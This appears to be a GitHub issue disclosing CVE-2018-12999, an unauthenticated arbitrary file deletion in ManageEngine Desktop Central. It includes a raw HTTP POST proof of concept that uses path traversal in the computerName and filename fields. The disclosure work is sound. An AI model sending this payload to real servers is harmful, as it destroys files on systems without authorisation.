You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
1. choose a useless file for test, ex: /images/demo/loginas_bottom.gif
2. send payload below:
POST /agenttrayicon HTTP/1.1
Host: 192.168.1.203:8020
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 129
screenShotAttached=yes&video_type=2&customerId=1&computerName=../../../&resourceId=xxx&filename=../images/demo/loginas_bottom.gif
3. Visit again the file has beed deleted
notice: It can be successfully reproduced without login info.
The text was updated successfully, but these errors were encountered:
unh3x
changed the title
Zoho manageengine Desktop Central Arbitrary File Deletion
[CVE-2018-12999]Zoho manageengine Desktop Central Arbitrary File Deletion
Jun 29, 2018
=================
Zoho manageengine Desktop Central Arbitrary File Deletion
Date: 2018/06/20
Software Link: https://www.manageengine.com/products/desktop-central/
Category: Web Application
Exploit Author: xiaotian.wang From DBAppSecurity
CVE: CVE-2018-12999
=================
Vulnerable cgi
com.adventnet.sym.webclient.statusupdate.AgentTrayIconServlet
=================
Proof of Concept:
1. choose a useless file for test, ex: /images/demo/loginas_bottom.gif
3. Visit again the file has beed deleted
notice: It can be successfully reproduced without login info.
The text was updated successfully, but these errors were encountered: